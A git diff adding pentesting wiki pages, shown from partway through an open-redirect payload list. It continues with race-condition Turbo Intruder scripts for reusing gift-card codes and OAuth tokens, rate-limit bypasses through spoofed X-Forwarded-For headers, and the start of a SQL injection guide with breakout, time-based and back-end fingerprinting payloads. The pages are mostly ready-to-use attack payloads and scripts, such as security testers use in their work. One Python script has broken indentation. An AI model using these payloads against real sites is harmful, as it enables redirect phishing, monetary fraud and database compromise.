+http://3H6k7lIAiqjfNeN@0xd83ad6ce
+http:3H6k7lIAiqjfNeN@0xd83ad6ce
+http://3H6k7lIAiqjfNeN@[::216.58.214.206]
+http:3H6k7lIAiqjfNeN@[::216.58.214.206]
+http://3H6k7lIAiqjfNeN@3627734734
+http:3H6k7lIAiqjfNeN@3627734734
+http://3H6k7lIAiqjfNeN@472.314.470.462
+http:3H6k7lIAiqjfNeN@472.314.470.462
+http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
+http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
+http://3H6k7lIAiqjfNeN@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+http://3H6k7lIAiqjfNeN@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/
+http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
+http://472.314.470.462
+http:472.314.470.462
+http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%5c%5c.whitelisted.com/
+/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
+http://%67%6f%6f%67%6c%65%2e%63%6f%6d
+http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:80?@whitelisted.com/
+http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:80#@whitelisted.com/
+http://[::ffff:216.58.214.206]
+http:[::ffff:216.58.214.206]
+/http://google.com
+/http:/google.com
+http://;@google.com
+http://.google.com
+http://google.com
+http:/\/\google.com
+http:/google.com
+http:google.com
+http://google.com%23.whitelisted.com/
+http://google.com%2f%2f.whitelisted.com/
+http://google.com%3F.whitelisted.com/
+http://google.com%5c%5c.whitelisted.com/
+http://google.com:80?@whitelisted.com/
+http://google.com:80#@whitelisted.com/
+http://google.com\twhitelisted.com/
+//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+https:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+https://%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/https://%09/google.com
+https://%09/google.com
+https://%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+https://%09/whitelisted.com@google.com
+https://%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+https://%0a%0dgoogle.com
+//https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+/https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+https%3a%2f%2fgoogle.com%2f
+/https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+/https://%5cgoogle.com
+/https:/%5cgoogle.com/
+https://%5cgoogle.com
+https:/%5cgoogle.com/
+/https://%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+https://%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/https://%5cwhitelisted.com@google.com
+https://%5cwhitelisted.com@google.com
+https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
+//https://google.com//
+/https://google.com//
+/https://google.com/
+/https://google.com
+/https:google.com
+https://////google.com
+https://google.com//
+https://google.com/
+https://google.com
+https:/\google.com
+https:google.com
+//https:///google.com/%2e%2e
+/https://google.com/%2e%2e
+https:///google.com/%2e%2e
+//https://google.com/%2e%2e%2f
+https://google.com/%2e%2e%2f
+/https://google.com/%2f..
+https://google.com/%2f..
+/https:///google.com/%2f%2e%2e
+/https://google.com/%2f%2e%2e
+https:///google.com/%2f%2e%2e
+https://google.com/%2f%2e%2e
+https://:@google.com\@whitelisted.com
+https://google.com?whitelisted.com
+https://google.com/whitelisted.com
+https://google.com\whitelisted.com
+https://google.com#whitelisted.com
+https://google%E3%80%82com
+//https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+https://:@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\@whitelisted.com
+https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/whitelisted.com
+https://whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+//https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+/https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+//https://whitelisted.com@google.com//
+/https://whitelisted.com@google.com/
+https://whitelisted.com;@google.com
+https://whitelisted.com.google.com
+https://whitelisted.com@google.com//
+https://whitelisted.com@google.com/
+https://whitelisted.com@google.com
+/https://whitelisted.com@google.com/%2e%2e
+https:///whitelisted.com@google.com/%2e%2e
+//https://whitelisted.com@google.com/%2e%2e%2f
+https://whitelisted.com@google.com/%2e%2e%2f
+/https://whitelisted.com@google.com/%2f..
+https://whitelisted.com@google.com/%2f..
+/https:///whitelisted.com@google.com/%2f%2e%2e
+/https://whitelisted.com@google.com/%2f%2e%2e
+https:///whitelisted.com@google.com/%2f%2e%2e
+https://whitelisted.com@google.com/%2f%2e%2e
+/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f..
+https://whitelisted.com/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+https://whitelisted.com/https://google.com/
+@https://www.google.com
+http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\twhitelisted.com/
+http://whitelisted.com@00330.00072.0000326.00000316
+http:whitelisted.com@00330.00072.0000326.00000316
+http://whitelisted.com@00330.0x3a.54990
+http:whitelisted.com@00330.0x3a.54990
+http://whitelisted.com@00330.3856078
+http:whitelisted.com@00330.3856078
+http://whitelisted.com@0330.072.0326.0316
+http:whitelisted.com@0330.072.0326.0316
+http://whitelisted.com@0xd8.072.54990
+http:whitelisted.com@0xd8.072.54990
+http://whitelisted.com@0xd8.0x3a.0xd6.0xce
+http:whitelisted.com@0xd8.0x3a.0xd6.0xce
+http://whitelisted.com@0xd8.3856078
+http:whitelisted.com@0xd8.3856078
+http://whitelisted.com@0xd83ad6ce
+http:whitelisted.com@0xd83ad6ce
+http://whitelisted.com@[::216.58.214.206]
+http:whitelisted.com@[::216.58.214.206]
+http://whitelisted.com%2eⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+http://whitelisted.com%2egoogle.com/
+http://whitelisted.com@3627734734
+http:whitelisted.com@3627734734
+http://whitelisted.com@472.314.470.462
+http:whitelisted.com@472.314.470.462
+http://whitelisted.com:80%40Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+http://whitelisted.com:80%40google.com/
+http://whitelisted.com@[::ffff:216.58.214.206]
+http:whitelisted.com@[::ffff:216.58.214.206]
+http://whitelisted.com@google.com/
+http://whitelisted.com+&@google.com#+@whitelisted.com/
+http://whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ#+@whitelisted.com/
+http://www.google.com\.whitelisted.com
+http://www.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\.whitelisted.com
+http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
+http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
+http://XY>.7d8T\205pZM@00330.0x3a.54990
+http:XY>.7d8T\205pZM@00330.0x3a.54990
+http://XY>.7d8T\205pZM@00330.3856078
+http:XY>.7d8T\205pZM@00330.3856078
+http://XY>.7d8T\205pZM@0330.072.0326.0316
+http:XY>.7d8T\205pZM@0330.072.0326.0316
+http://XY>.7d8T\205pZM@0xd8.072.54990
+http:XY>.7d8T\205pZM@0xd8.072.54990
+http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
+http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
+http://XY>.7d8T\205pZM@0xd8.3856078
+http:XY>.7d8T\205pZM@0xd8.3856078
+http://XY>.7d8T\205pZM@0xd83ad6ce
+http:XY>.7d8T\205pZM@0xd83ad6ce
+http://XY>.7d8T\205pZM@[::216.58.214.206]
+http:XY>.7d8T\205pZM@[::216.58.214.206]
+http://XY>.7d8T\205pZM@3627734734
+http:XY>.7d8T\205pZM@3627734734
+http://XY>.7d8T\205pZM@472.314.470.462
+http:XY>.7d8T\205pZM@472.314.470.462
+http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
+http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
+http://XY>.7d8T\205pZM@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+http://XY>.7d8T\205pZM@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+http://XY>.7d8T\205pZM@whitelisted.com@google.com/
+http://XY>.7d8T\205pZM@whitelisted.com+@google.com/
+ja\nva\tscript\r:alert(1)
+java%09script:alert(1)
+java%0ascript:alert(1)
+java%0d%0ascript%0d%0a:alert(0)
+java%0dscript:alert(1)
+Javas%26%2399;ript:alert(1)
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\twhitelisted.com/
+\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
+////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/whitelisted.com
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\@whitelisted.com
+//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/whitelisted.com
+whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+/\whitelisted.com:80%40google.com
+whitelisted.com@%E2%80%AE@google.com
+////whitelisted.com@google.com//
+////whitelisted.com@google.com/
+///whitelisted.com@google.com//
+///whitelisted.com@google.com/
+//whitelisted.com@google.com//
+//whitelisted.com@google.com/
+whitelisted.com;@google.com
+whitelisted.com.google.com
+////whitelisted.com@google.com/%2e%2e
+///whitelisted.com@google.com/%2e%2e
+////whitelisted.com@google.com/%2e%2e%2f
+///whitelisted.com@google.com/%2e%2e%2f
+//whitelisted.com@google.com/%2e%2e%2f
+////whitelisted.com@google.com/%2f..
+///whitelisted.com@google.com/%2f..
+//whitelisted.com@google.com/%2f..
+////whitelisted.com@google.com/%2f%2e%2e
+///whitelisted.com@google.com/%2f%2e%2e
+//whitelisted.com@google.com/%2f%2e%2e
+//whitelisted.com+&@google.com#+@whitelisted.com/
+//whitelisted.com@https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+//whitelisted.com@https:///google.com/%2e%2e
+//whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ#+@whitelisted.com/
+\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
+//XY>.7d8T\205pZM@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+//XY>.7d8T\205pZM@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+//XY>.7d8T\205pZM@whitelisted.com@google.com/
+//XY>.7d8T\205pZM@whitelisted.com+@google.com/
+```
+
+## Open Redirect uploading svg files
+
+```text
+<code>
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<svg
+onload="window.location='http://www.example.com'"
+xmlns="http://www.w3.org/2000/svg">
+</svg>
+</code>
+```
+
+## Common injection parameters
+
+```text
+/{payload}
+?next={payload}
+?url={payload}
+?target={payload}
+?rurl={payload}
+?dest={payload}
+?destination={payload}
+?redir={payload}
+?redirect_uri={payload}
+?redirect_url={payload}
+?redirect={payload}
+/redirect/{payload}
+/cgi-bin/redirect.cgi?{payload}
+/out/{payload}
+/out?{payload}
+?view={payload}
+/login?to={payload}
+?image_url={payload}
+?go={payload}
+?return={payload}
+?returnTo={payload}
+?return_to={payload}
+?checkout_url={payload}
+?continue={payload}
+?return_path={payload}
+success=https://c1h2e1.github.io
+data=https://c1h2e1.github.io
+qurl=https://c1h2e1.github.io
+login=https://c1h2e1.github.io
+logout=https://c1h2e1.github.io
+ext=https://c1h2e1.github.io
+clickurl=https://c1h2e1.github.io
+goto=https://c1h2e1.github.io
+rit_url=https://c1h2e1.github.io
+forward_url=https://c1h2e1.github.io
+@https://c1h2e1.github.io
+forward=https://c1h2e1.github.io
+pic=https://c1h2e1.github.io
+callback_url=https://c1h2e1.github.io
+jump=https://c1h2e1.github.io
+jump_url=https://c1h2e1.github.io
+click?u=https://c1h2e1.github.io
+originUrl=https://c1h2e1.github.io
+origin=https://c1h2e1.github.io
+Url=https://c1h2e1.github.io
+desturl=https://c1h2e1.github.io
+u=https://c1h2e1.github.io
+page=https://c1h2e1.github.io
+u1=https://c1h2e1.github.io
+action=https://c1h2e1.github.io
+action_url=https://c1h2e1.github.io
+Redirect=https://c1h2e1.github.io
+sp_url=https://c1h2e1.github.io
+service=https://c1h2e1.github.io
+recurl=https://c1h2e1.github.io
+j?url=https://c1h2e1.github.io
+url=//https://c1h2e1.github.io
+uri=https://c1h2e1.github.io
+u=https://c1h2e1.github.io
+allinurl:https://c1h2e1.github.io
+q=https://c1h2e1.github.io
+link=https://c1h2e1.github.io
+src=https://c1h2e1.github.io
+tc?src=https://c1h2e1.github.io
+linkAddress=https://c1h2e1.github.io
+location=https://c1h2e1.github.io
+burl=https://c1h2e1.github.io
+request=https://c1h2e1.github.io
+backurl=https://c1h2e1.github.io
+RedirectUrl=https://c1h2e1.github.io
+Redirect=https://c1h2e1.github.io
+ReturnUrl=https://c1h2e1.github.io
+```
+
+## Resources
+
+In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect)  you can find fuzzing lists.  
+[https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)  
+[https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
+
diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md
new file mode 100644
index 00000000..3019a5ca
--- /dev/null
+++ b/pentesting-web/race-condition.md
@@ -0,0 +1,84 @@
+# Race Condition
+
+## Anything limited by a number of attempts
+
+Race conditions are **vulnerabilities** that **appear** in webs that **limit the number of times you can perform an action**. A very easy example can be found in [**this report**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43).
+
+## Using several times a one-time use code
+
+When you make the web page perform some **action** that **should be done only once**, but if the action is done **several times** you will be **benefited**, you really need to try a **Race condicion**.  
+Most of the time this is directly related with **money** \(if an action is made you get X money, so let's try to make it several time very quickly\)**.**
+
+### **Using from the same account the same code several times**
+
+For example, in [**this bug** ](https://hackerone.com/reports/759247)the hunter was able to **load the money inside a gift card several times.**
+
+This is the **turbo intruder** script used to **test** the **race condition** of the mentioned writeup:
+
+```python
+def queueRequests(target, wordlists):
+    engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=30,
+                           requestsPerConnection=30,
+                           pipeline=False
+                           )
+
+   for i in range(30):
+    engine.queue(target.req, i)
+        engine.queue(target.req, target.baseInput, gate='race1')
+
+
+    engine.start(timeout=5)
+   engine.openGate('race1')
+
+    engine.complete(timeout=60)
+
+
+def handleResponse(req, interesting):
+    table.add(req)
+```
+
+Using also BURP you could also send the **request** to **Intruder**, set the **number of threads** to **30** inside the **Options menu and,** select as payload **Null payloads** and generate **30.**
+
+### **Using the same code from different accounts**
+
+**If the previously proposal didn't work \(try to use the same code several times from the same account\) you try a variant:Try t use the same code from different accounts:**
+
+```python
+def queueRequests(target, wordlists):
+    engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=5,
+                           requestsPerConnection=1,
+                           pipeline=False
+                           )
+    a = ['Session=<session_id_1>','Session=<session_id_2>','Session=<session_id_3>']
+    for i in range(len(a)):
+        engine.queue(target.req,a[i], gate='race1')
+    # open TCP connections and send partial requests
+    engine.start(timeout=10)
+    engine.openGate('race1')
+    engine.complete(timeout=60)
+
+def handleResponse(req, interesting):
+    table.add(req)
+```
+
+### OAuth2 eternal persistence
+
+There are several [**OAUth providers**](https://en.wikipedia.org/wiki/List_of_OAuth_providers). Theses services will allow you to create an application and authenticate users that the provider has registered. In order to do so, the **client** will need to **permit your application** to access some of their data inside of the **OAUth provider**.  
+So, until here just a common login with google/linkdin/github... where you aer prompted with a page saying: "_Application &lt;InsertCoolName&gt; wants to access you information, do you want to allow it?_"
+
+#### Race Condition in `authorization_code`
+
+The **problem** appears when you **accept it** and automatically sends a  **`authorization_code`** to the malicious application. Then, this **application abuses a Race Condition in the OAUth service provider to generate more that one AT/RT** \(_Authentication Token/Refresh Token_\) from the **`authorization_code`** for your account. Basically, it will abuse the fact that you have accept the application to access your data to **create several accounts**. Then, if you **stop allowing the application to access your data one pair of AT/RT will be deleted, but the other ones will still be valid**.
+
+#### Race Condition in `Refresh Token`
+
+Once you have **obtained a valid RT** you could try to **abuse it to generate several AT/RT** and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid.** 
+
+## References
+
+* [https://hackerone.com/reports/759247](https://hackerone.com/reports/759247)
+* [https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html](https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html)
+* [https://hackerone.com/reports/55140](https://hackerone.com/reports/55140)
+
diff --git a/pentesting-web/rate-limit-bypass.md b/pentesting-web/rate-limit-bypass.md
new file mode 100644
index 00000000..70bfc62b
--- /dev/null
+++ b/pentesting-web/rate-limit-bypass.md
@@ -0,0 +1,27 @@
+# Rate Limit Bypass
+
+### Using similar endpoints
+
+If you are attacking the `/api/v3/sign-up` endpoint try to perform bruteforce to `/Sing-up`, `/SignUp`, `/singup`...
+
+Also try appending to the original endpoint bytes like `%00, %0d%0a, %0d, %0a, %09, %0C, %20`
+
+### Changing IP origin using headers
+
+```text
+X-Originating-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+
+#or use double X-Forwared-For header
+X-Forwarded-For:
+X-Forwarded-For: 127.0.0.1
+```
+
+If they are limiting to 10 tries per IP, every 10 tries change the IP inside the header.
+
+### Change other headers
+
+Try changing the user-agent, the cookies... anything that could be able to identify you.
+
diff --git a/pentesting-web/sql-injection/README.md b/pentesting-web/sql-injection/README.md
new file mode 100644
index 00000000..e4c71b84
--- /dev/null
+++ b/pentesting-web/sql-injection/README.md
@@ -0,0 +1,482 @@
+# SQL Injection
+
+## What is SQL injection?
+
+SQL injection is a web security vulnerability that allows an attacker to **interfere** with the **queries** that an application makes to its **database**. It generally allows an attacker to **view data** that they are not normally able to retrieve. This might include data belonging to **other users**, or any other data that the **application** itself is able to **access**. In many cases, an attacker can **modify** or **delete** this data, causing persistent changes to the application's content or behaviour.  
+In some situations, an attacker can escalate an SQL injection attack to **compromise the underlying server** or other back-end infrastructure, or perform a denial-of-service attack. \(From [here](https://portswigger.net/web-security/sql-injection)\).
+
+> In this POST I'm going to suppose that we have found a possible SQL injection and we are going to discuss possible methods to confirm the SQL injection, recon the database and perform actions.
+
+## Entry point detection
+
+You may have found a site that is **apparently vulnerable to SQL**i just because the server is behaving weird with SQLi related inputs. Therefore, the **first thing** you need to do is how to **inject data in the query without breaking it.** To do so you first need to find how to **escape from the current context.**  
+These are some useful examples:
+
+```text
+ [Nothing]
+'
+"
+`
+')
+")
+`)
+'))
+"))
+`))
+```
+
+Then, you need to know how to **fix the query so there isn't errors**. In order to fix the query you can **input** data so the **previous query accept the new data**, or you can just **input** your data and **add a comment symbol add the end**.
+
+_Note that if you can see error messages or you can spot differences when a query is working and when it's not this phase will be more easy._
+
+### **Comments**
+
+```sql
+MySQL
+#comment
+-- comment     [Note the space after the double dash]
+/*comment*/
+/*! MYSQL Special SQL */
+
+PostgreSQL
+--comment
+/*comment*/
+
+MSQL
+--comment
+/*comment*/
+
+Oracle
+--comment
+
+SQLite
+--comment
+/*comment*/
+
+HQL
+HQL does not support comments
+```
+
+### Confirming with logical operations
+
+One of the best ways to confirm a SQL injection is by making it operate a **logical operation** and having the expected results.  
+For example: if the GET parameter `?username=Peter` returns the same content as `?username=Peter' or '1'='1` then, you found a SQL injection.
+
+Also you can apply this concept to **mathematical operations**. Example: If `?id=1` returns the same as `?id=2-1`, SQLinjection.
+
+```text
+page.asp?id=1 or 1=1 -- true
+page.asp?id=1' or 1=1 -- true
+page.asp?id=1" or 1=1 -- true
+page.asp?id=1 and 1=2 -- false
+```
+
+This word-list was created to try to **confirm SQLinjections** in the proposed way:
+
+{% file src="../../.gitbook/assets/sqli-logic.txt" %}
+
+### Confirming with Timing
+
+In some cases you **won't notice any change** on the page you are testing. Therefore, a good way to **discover blind SQL injections** is making the DB perform actions and will have an **impact on the time** the page need to load.  
+Therefore, the we are going to concat in the SQL query an operation that will take a lot of time to complete:
+
+```text
+MySQL (string concat and logical ops)
+1' + sleep(10)
+1' and sleep(10)
+1' && sleep(10)
+1' | sleep(10)
+
+PostgreSQL (only support string concat)
+1' || pg_sleep(10)
+
+MSQL
+1' WAITFOR DELAY '0:0:10'
+
+Oracle
+1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
+1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)
+
+SQLite
+1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
+```
+
+In some cases the **sleep functions won't be allowed**. Then, instead of using those functions you could make the query **perform complex operations** that will take several seconds. _Examples of these techniques are going to be commented separately on each technology \(if any\)_.
+
+### Identifying Back-end
+
+The best way to identify the back-end is trying to execute functions of the different back-ends. You could use the _**sleep**_ **functions** of the previous section or these ones:
+
+```text
+["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
+["connection_id()=connection_id()"                 ,"MYSQL"],
+["crc32('MySQL')=crc32('MySQL')"                   ,"MYSQL"],
+["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"       ,"MSSQL"],
+["@@CONNECTIONS>0"                                 ,"MSSQL"],
+["@@CONNECTIONS=@@CONNECTIONS"                     ,"MSSQL"],
+["@@CPU_BUSY=@@CPU_BUSY"                           ,"MSSQL"],
+["USER_ID(1)=USER_ID(1)"                           ,"MSSQL"],
+["ROWNUM=ROWNUM"                                   ,"ORACLE"],
+["RAWTOHEX('AB')=RAWTOHEX('AB')"                   ,"ORACLE"],
